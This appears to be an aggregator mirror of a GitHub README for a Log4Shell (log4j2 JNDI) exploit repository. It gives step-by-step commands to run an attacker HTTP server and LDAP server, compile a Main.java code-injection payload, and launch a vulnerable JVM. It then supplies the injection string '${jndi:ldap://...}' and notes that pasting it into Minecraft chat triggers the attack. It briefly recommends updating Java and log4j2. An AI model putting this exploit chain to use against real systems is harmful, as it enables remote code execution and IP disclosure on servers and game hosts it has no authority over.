1
GitHub - ilsubyeega/log4j2-exploits: log4j2 remote code execution or IP leakage...
source link: https://github.com/ilsubyeega/log4j2-exploits
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
log4j2-exploits
2021-12-11.12-17-44.mp4
This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes)
However, the logging library for java called log4j2 had JNDILookup, which allowed access to protocols such as LDAP, which allowed code injection in older java versions.
Patched versions of java can prevent code injection, but JNDILookup makes request to ldap server, which can lead to IP leaks.
The solution is to update Java and log4j2 versions.
Running
- Install requirements
cd http-server && npm install
cd ldap-server && npm install
- run
http-serverandldap-serverboth
cd http-server && node index.js
cd ldap-server && node index.js
- Compile Main.java
# This will generate Main.java - required to code injection. javac Main.java
- Start jvm with parameters
# You can still use log4j-client in repo for internal testing. cd log4j-client gradlew jar java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar # Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server. java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar
- Send
${jndi:ldap://127.0.0.1:3001/}to any payloads. (In minecraft, just chatting this will work if exploits are working.)
References
License
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK